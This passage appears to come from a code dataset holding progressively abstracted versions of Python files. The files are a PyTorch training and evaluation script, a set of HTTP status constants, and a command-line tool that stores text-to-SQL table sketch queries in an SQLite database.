writer.add_scalar(f'{k}/train', v, global_step)\n b_time = time.time() - end\n batch_time.update(b_time)\n writer.add_scalar('time/batch/train', b_time, global_step)\n end = time.time()\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n progress.display(batch_nb, print_fn=lambda *x: time_print(*x,\n end='\\r'))\n\n\ndef test(cfg, data_loader, model):\n data_time = AverageMeter('Data', ':6.3f')\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n metrics = ['performance']\n metrics = {m: AverageMeter(m, ':.4e') for m in metrics}\n progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,\n losses, *metrics.values()], prefix='Test:\\t')\n model.eval()\n global_step = model.global_step\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n data_time.update(time.time() - end)\n with torch.no_grad():\n report = model.test_step(batch, batch_nb)\n losses.update(report['loss'])\n for k, v in report.items():\n if k not in metrics:\n metrics[k] = AverageMeter(k, ':.3f')\n metrics[k].update(v)\n batch_time.update(time.time() - end)\n end = time.time()\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n progress.display(batch_nb, print_fn=lambda *x: time_print(*x,\n end='\\r'))\n writer.add_scalar('loss/test', losses.avg, global_step)\n writer.add_scalar('time/batch/test', batch_time.avg, global_step)\n writer.add_scalar('time/data/test', data_time.avg, global_step)\n for k, v in metrics.items():\n writer.add_scalar(f'{k}/test', v.avg, global_step)\n progress.display(len(data_loader) - 1, time_print)\n\n\ndef main(cfg, pool=None):\n model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool\n )\n if getattr(cfg, 'load_model', False):\n model.load_ckpt()\n if model.device != 'cpu' and torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n model = model.to(model.device)\n train_loader = model.get_train_loader()\n test_loader = model.get_test_loader()\n for epoch in range(cfg.num_epoch):\n time_print(f'\\nEpoch {epoch} Training')\n train(cfg, epoch, train_loader, model)\n filename = 'checkpoint.pth.tar'\n if not getattr(cfg.log, 'overwrite_ckpt', True):\n filename = '_'.join([str(epoch), filename])\n save_checkpoint(state={'epoch': epoch, 'global_step': model.\n global_step, 'state_dict': model.state_dict(), 'opt_state_dict':\n {k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':\n cfg}, directory=cfg.log.misc_dir, filename=filename)\n time_print('\\nTest')\n test(cfg, test_loader, model)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Run script')\n parser.add_argument('--config', '-c', type=str, required=False, default\n ='config')\n args = parser.parse_args()\n git_state = get_git_state()\n config = importlib.import_module(f'configs.{args.config}').config\n config.log.exp_id = git_state[1][:7] + datetime.datetime.now().strftime(\n '%Y-%m-%d_%H:%M:%S')\n config.log.misc_dir = config.log.dir / 'misc' / config.log.exp_id\n config.log.tb_dir = config.log.dir / 'tb' / config.log.exp_id\n config.log.misc_dir.mkdir(exist_ok=True, parents=True)\n config.log.tb_dir.mkdir(exist_ok=True, parents=True)\n torch.manual_seed(config.rnd_seed)\n np.random.seed(config.rnd_seed)\n random.seed(config.rnd_seed)\n if getattr(config, 'anomaly_detection', False):\n torch.autograd.set_detect_anomaly(True)\n global writer\n writer = SummaryWriter(log_dir=config.log.tb_dir, comment=\n f'{config.description}, {git_state}')\n time_print(pprint.pformat(config))\n time_print(f'Git head at state: {git_state}')\n try:\n if (npp := getattr(config, 'n_process_pool', 0)):\n with torch.multiprocessing.Pool(npp) as pool:\n main(config, pool=pool)\n else:\n main(config)\n except KeyboardInterrupt:\n time_print(f'Keyboard interrupt')\n exit(0)\n", "<import token>\n\n\ndef train(cfg, epoch, data_loader, model):\n data_time = AverageMeter('Data', ':6.3f')\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,\n losses], prefix=f'Epoch: [{epoch}]\\t')\n model.train()\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n d_time = time.time() - end\n data_time.update(d_time)\n global_step = model.global_step\n writer.add_scalar('time/data/train', d_time, global_step)\n report = model.training_step(batch, batch_nb)\n losses.update(report['loss'])\n for k, v in report.items():\n writer.add_scalar(f'{k}/train', v, global_step)\n b_time = time.time() - end\n batch_time.update(b_time)\n writer.add_scalar('time/batch/train', b_time, global_step)\n end = time.time()\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n progress.display(batch_nb, print_fn=lambda *x: time_print(*x,\n end='\\r'))\n\n\ndef test(cfg, data_loader, model):\n data_time = AverageMeter('Data', ':6.3f')\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n metrics = ['performance']\n metrics = {m: AverageMeter(m, ':.4e') for m in metrics}\n progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,\n losses, *metrics.values()], prefix='Test:\\t')\n model.eval()\n global_step = model.global_step\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n data_time.update(time.time() - end)\n with torch.no_grad():\n report = model.test_step(batch, batch_nb)\n losses.update(report['loss'])\n for k, v in report.items():\n if k not in metrics:\n metrics[k] = AverageMeter(k, ':.3f')\n metrics[k].update(v)\n batch_time.update(time.time() - end)\n end = time.time()\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n progress.display(batch_nb, print_fn=lambda *x: time_print(*x,\n end='\\r'))\n writer.add_scalar('loss/test', losses.avg, global_step)\n writer.add_scalar('time/batch/test', batch_time.avg, global_step)\n writer.add_scalar('time/data/test', data_time.avg, global_step)\n for k, v in metrics.items():\n writer.add_scalar(f'{k}/test', v.avg, global_step)\n progress.display(len(data_loader) - 1, time_print)\n\n\ndef main(cfg, pool=None):\n model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool\n )\n if getattr(cfg, 'load_model', False):\n model.load_ckpt()\n if model.device != 'cpu' and torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n model = model.to(model.device)\n train_loader = model.get_train_loader()\n test_loader = model.get_test_loader()\n for epoch in range(cfg.num_epoch):\n time_print(f'\\nEpoch {epoch} Training')\n train(cfg, epoch, train_loader, model)\n filename = 'checkpoint.pth.tar'\n if not getattr(cfg.log, 'overwrite_ckpt', True):\n filename = '_'.join([str(epoch), filename])\n save_checkpoint(state={'epoch': epoch, 'global_step': model.\n global_step, 'state_dict': model.state_dict(), 'opt_state_dict':\n {k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':\n cfg}, directory=cfg.log.misc_dir, filename=filename)\n time_print('\\nTest')\n test(cfg, test_loader, model)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Run script')\n parser.add_argument('--config', '-c', type=str, required=False, default\n ='config')\n args = parser.parse_args()\n git_state = get_git_state()\n config = importlib.import_module(f'configs.{args.config}').config\n config.log.exp_id = git_state[1][:7] + datetime.datetime.now().strftime(\n '%Y-%m-%d_%H:%M:%S')\n config.log.misc_dir = config.log.dir / 'misc' / config.log.exp_id\n config.log.tb_dir = config.log.dir / 'tb' / config.log.exp_id\n config.log.misc_dir.mkdir(exist_ok=True, parents=True)\n config.log.tb_dir.mkdir(exist_ok=True, parents=True)\n torch.manual_seed(config.rnd_seed)\n np.random.seed(config.rnd_seed)\n random.seed(config.rnd_seed)\n if getattr(config, 'anomaly_detection', False):\n torch.autograd.set_detect_anomaly(True)\n global writer\n writer = SummaryWriter(log_dir=config.log.tb_dir, comment=\n f'{config.description}, {git_state}')\n time_print(pprint.pformat(config))\n time_print(f'Git head at state: {git_state}')\n try:\n if (npp := getattr(config, 'n_process_pool', 0)):\n with torch.multiprocessing.Pool(npp) as pool:\n main(config, pool=pool)\n else:\n main(config)\n except KeyboardInterrupt:\n time_print(f'Keyboard interrupt')\n exit(0)\n", "<import token>\n\n\ndef train(cfg, epoch, data_loader, model):\n data_time = AverageMeter('Data', ':6.3f')\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,\n losses], prefix=f'Epoch: [{epoch}]\\t')\n model.train()\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n d_time = time.time() - end\n data_time.update(d_time)\n global_step = model.global_step\n writer.add_scalar('time/data/train', d_time, global_step)\n report = model.training_step(batch, batch_nb)\n losses.update(report['loss'])\n for k, v in report.items():\n writer.add_scalar(f'{k}/train', v, global_step)\n b_time = time.time() - end\n batch_time.update(b_time)\n writer.add_scalar('time/batch/train', b_time, global_step)\n end = time.time()\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n progress.display(batch_nb, print_fn=lambda *x: time_print(*x,\n end='\\r'))\n\n\ndef test(cfg, data_loader, model):\n data_time = AverageMeter('Data', ':6.3f')\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n metrics = ['performance']\n metrics = {m: AverageMeter(m, ':.4e') for m in metrics}\n progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,\n losses, *metrics.values()], prefix='Test:\\t')\n model.eval()\n global_step = model.global_step\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n data_time.update(time.time() - end)\n with torch.no_grad():\n report = model.test_step(batch, batch_nb)\n losses.update(report['loss'])\n for k, v in report.items():\n if k not in metrics:\n metrics[k] = AverageMeter(k, ':.3f')\n metrics[k].update(v)\n batch_time.update(time.time() - end)\n end = time.time()\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n progress.display(batch_nb, print_fn=lambda *x: time_print(*x,\n end='\\r'))\n writer.add_scalar('loss/test', losses.avg, global_step)\n writer.add_scalar('time/batch/test', batch_time.avg, global_step)\n writer.add_scalar('time/data/test', data_time.avg, global_step)\n for k, v in metrics.items():\n writer.add_scalar(f'{k}/test', v.avg, global_step)\n progress.display(len(data_loader) - 1, time_print)\n\n\ndef main(cfg, pool=None):\n model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool\n )\n if getattr(cfg, 'load_model', False):\n model.load_ckpt()\n if model.device != 'cpu' and torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n model = model.to(model.device)\n train_loader = model.get_train_loader()\n test_loader = model.get_test_loader()\n for epoch in range(cfg.num_epoch):\n time_print(f'\\nEpoch {epoch} Training')\n train(cfg, epoch, train_loader, model)\n filename = 'checkpoint.pth.tar'\n if not getattr(cfg.log, 'overwrite_ckpt', True):\n filename = '_'.join([str(epoch), filename])\n save_checkpoint(state={'epoch': epoch, 'global_step': model.\n global_step, 'state_dict': model.state_dict(), 'opt_state_dict':\n {k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':\n cfg}, directory=cfg.log.misc_dir, filename=filename)\n time_print('\\nTest')\n test(cfg, test_loader, model)\n\n\n<code token>\n", "<import token>\n\n\ndef train(cfg, epoch, data_loader, model):\n data_time = AverageMeter('Data', ':6.3f')\n batch_time = AverageMeter('Time', ':6.3f')\n losses = AverageMeter('Loss', ':.4e')\n progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,\n losses], prefix=f'Epoch: [{epoch}]\\t')\n model.train()\n end = time.time()\n for batch_nb, batch in enumerate(data_loader):\n d_time = time.time() - end\n data_time.update(d_time)\n global_step = model.global_step\n writer.add_scalar('time/data/train', d_time, global_step)\n report = model.training_step(batch, batch_nb)\n losses.update(report['loss'])\n for k, v in report.items():\n writer.add_scalar(f'{k}/train', v, global_step)\n b_time = time.time() - end\n batch_time.update(b_time)\n writer.add_scalar('time/batch/train', b_time, global_step)\n end = time.time()\n if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:\n progress.display(batch_nb, print_fn=lambda *x: time_print(*x,\n end='\\r'))\n\n\n<function token>\n\n\ndef main(cfg, pool=None):\n model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool\n )\n if getattr(cfg, 'load_model', False):\n model.load_ckpt()\n if model.device != 'cpu' and torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n model = model.to(model.device)\n train_loader = model.get_train_loader()\n test_loader = model.get_test_loader()\n for epoch in range(cfg.num_epoch):\n time_print(f'\\nEpoch {epoch} Training')\n train(cfg, epoch, train_loader, model)\n filename = 'checkpoint.pth.tar'\n if not getattr(cfg.log, 'overwrite_ckpt', True):\n filename = '_'.join([str(epoch), filename])\n save_checkpoint(state={'epoch': epoch, 'global_step': model.\n global_step, 'state_dict': model.state_dict(), 'opt_state_dict':\n {k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':\n cfg}, directory=cfg.log.misc_dir, filename=filename)\n time_print('\\nTest')\n test(cfg, test_loader, model)\n\n\n<code token>\n", "<import token>\n<function token>\n<function token>\n\n\ndef main(cfg, pool=None):\n model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool\n )\n if getattr(cfg, 'load_model', False):\n model.load_ckpt()\n if model.device != 'cpu' and torch.cuda.device_count() > 1:\n model = torch.nn.DataParallel(model)\n model = model.to(model.device)\n train_loader = model.get_train_loader()\n test_loader = model.get_test_loader()\n for epoch in range(cfg.num_epoch):\n time_print(f'\\nEpoch {epoch} Training')\n train(cfg, epoch, train_loader, model)\n filename = 'checkpoint.pth.tar'\n if not getattr(cfg.log, 'overwrite_ckpt', True):\n filename = '_'.join([str(epoch), filename])\n save_checkpoint(state={'epoch': epoch, 'global_step': model.\n global_step, 'state_dict': model.state_dict(), 'opt_state_dict':\n {k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':\n cfg}, directory=cfg.log.misc_dir, filename=filename)\n time_print('\\nTest')\n test(cfg, test_loader, model)\n\n\n<code token>\n", "<import token>\n<function token>\n<function token>\n<function token>\n<code token>\n" ]
false
92
d90942f22cbbd9cfc3a431b7857cd909a7690966
OK = 200 CREATED = 201 NOT_MODIFIED = 304 UNAUTHORIZED = 401 FORBIDDEN = 403 BAD_REQUEST = 400 NOT_FOUND = 404 CONFLICT = 409 UNPROCESSABLE = 422 INTERNAL_SERVER_ERROR = 500 NOT_IMPLEMENTED = 501 SERVICE_UNAVAILABLE = 503 ADMIN = 'admin' ELITE = 'elite' NOOB = 'noob' WITHDRAW = 'withdraw' FUND = 'fund'
[ "OK = 200\nCREATED = 201\nNOT_MODIFIED = 304\nUNAUTHORIZED = 401\nFORBIDDEN = 403\nBAD_REQUEST = 400\nNOT_FOUND = 404\nCONFLICT = 409\nUNPROCESSABLE = 422\nINTERNAL_SERVER_ERROR = 500\nNOT_IMPLEMENTED = 501\nSERVICE_UNAVAILABLE = 503\n\nADMIN = 'admin'\nELITE = 'elite'\nNOOB = 'noob'\nWITHDRAW = 'withdraw'\nFUND = 'fund'\n", "OK = 200\nCREATED = 201\nNOT_MODIFIED = 304\nUNAUTHORIZED = 401\nFORBIDDEN = 403\nBAD_REQUEST = 400\nNOT_FOUND = 404\nCONFLICT = 409\nUNPROCESSABLE = 422\nINTERNAL_SERVER_ERROR = 500\nNOT_IMPLEMENTED = 501\nSERVICE_UNAVAILABLE = 503\nADMIN = 'admin'\nELITE = 'elite'\nNOOB = 'noob'\nWITHDRAW = 'withdraw'\nFUND = 'fund'\n", "<assignment token>\n" ]
false
93
54ec1961f4835f575e7129bd0b2fcdeb97be2f03
import configparser import sqlite3 import time import uuid from duoquest.tsq import TableSketchQuery def input_db_name(conn): while True: db_name = input('Database name (default: concert_singer) > ') if not db_name: db_name = 'concert_singer' cur = conn.cursor() cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,)) if cur.fetchone(): break else: print(f'<{db_name}> is not a valid database.') return db_name def input_nlq(): nlq = input('NLQ (default: How many singers are there?)> ') if not nlq: nlq = 'How many singers are there?' return nlq def input_num_cols(): while True: num_cols = input('Number of columns > ') try: num_cols = int(num_cols) break except Exception as e: print('Number of columns should be integer!') return num_cols def input_order(): ordered = False while True: order_input = input('Should results be ordered? (y/n) > ') if order_input == 'y': ordered = True break elif order_input == 'n': break else: print('y/n only!') return ordered def input_limit(): limit = None while True: limit_input = input('Limit results to n tuples? (int or blank) > ') if not limit_input: break try: limit = int(limit_input) break except Exception as e: print('int or blank only!') return limit def input_tsq_types(num_cols): while True: types_input = input('Types (`text` or `number`, comma separated)> ') types = list(map(lambda x: x.strip(), types_input.split(','))) if any(map(lambda x: x not in ('text', 'number'), types)): print('Types must be `text` or `number`') continue if len(types) != num_cols: print('Number of types must match number of columns.') continue break return types def input_tsq_row_count(): tsq_row_count = 0 while True: tsq_row_count_input = input('Number of TSQ rows (int) > ') try: tsq_row_count = int(tsq_row_count_input) break except Exception as e: print('int only!') return tsq_row_count def input_tsq_row(row_num, tsq_types): while True: row_input = input(f'Row {row_num} (semicolon-separated values) > ') tsq_row = list(map(lambda x: x.strip(), row_input.split(';'))) validated = True for i, cell in enumerate(tsq_row): if tsq_types[i] == 'number': try: float(cell) except Exception as e: print('At least one cell value is invalid.') validated = False break if validated: break return tsq_row def main(): config = configparser.ConfigParser() config.read('config.ini') db_path = config['db']['path'] conn = sqlite3.connect(db_path) db_name = input_db_name(conn) nlq = input_nlq() num_cols = input_num_cols() tsq = TableSketchQuery(num_cols) tsq.types = input_tsq_types(num_cols) tsq_row_count = input_tsq_row_count() for i in range(tsq_row_count): tsq.values.append(input_tsq_row(i+1, tsq.types)) tsq.order = input_order() tsq.limit = input_limit() print(tsq.to_proto()) cur = conn.cursor() cur.execute('''INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time) VALUES (?, ?, ?, ?, ?, ?)''', (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().SerializeToString(), 'waiting', int(time.time()))) conn.commit() conn.close() if __name__ == '__main__': main()
[ "import configparser\nimport sqlite3\nimport time\nimport uuid\n\nfrom duoquest.tsq import TableSketchQuery\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n\n return types\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n\n return tsq_row\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n\n conn = sqlite3.connect(db_path)\n\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n\n tsq = TableSketchQuery(num_cols)\n\n tsq.types = input_tsq_types(num_cols)\n\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i+1, tsq.types))\n\n tsq.order = input_order()\n tsq.limit = input_limit()\n\n print(tsq.to_proto())\n\n cur = conn.cursor()\n cur.execute('''INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)''',\n (str(uuid.uuid4()), db_name, nlq,\n tsq.to_proto().SerializeToString(), 'waiting',\n int(time.time())))\n conn.commit()\n conn.close()\n\nif __name__ == '__main__':\n main()\n", "import configparser\nimport sqlite3\nimport time\nimport uuid\nfrom duoquest.tsq import TableSketchQuery\n\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n conn = sqlite3.connect(db_path)\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n tsq = TableSketchQuery(num_cols)\n tsq.types = input_tsq_types(num_cols)\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i + 1, tsq.types))\n tsq.order = input_order()\n tsq.limit = input_limit()\n print(tsq.to_proto())\n cur = conn.cursor()\n cur.execute(\n \"\"\"INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)\"\"\"\n , (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().\n SerializeToString(), 'waiting', int(time.time())))\n conn.commit()\n conn.close()\n\n\nif __name__ == '__main__':\n main()\n", "<import token>\n\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n conn = sqlite3.connect(db_path)\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n tsq = TableSketchQuery(num_cols)\n tsq.types = input_tsq_types(num_cols)\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i + 1, tsq.types))\n tsq.order = input_order()\n tsq.limit = input_limit()\n print(tsq.to_proto())\n cur = conn.cursor()\n cur.execute(\n \"\"\"INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)\"\"\"\n , (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().\n SerializeToString(), 'waiting', int(time.time())))\n conn.commit()\n conn.close()\n\n\nif __name__ == '__main__':\n main()\n", "<import token>\n\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n conn = sqlite3.connect(db_path)\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n tsq = TableSketchQuery(num_cols)\n tsq.types = input_tsq_types(num_cols)\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i + 1, tsq.types))\n tsq.order = input_order()\n tsq.limit = input_limit()\n print(tsq.to_proto())\n cur = conn.cursor()\n cur.execute(\n \"\"\"INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)\"\"\"\n , (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().\n SerializeToString(), 'waiting', int(time.time())))\n conn.commit()\n conn.close()\n\n\n<code token>\n", "<import token>\n\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\n\ndef 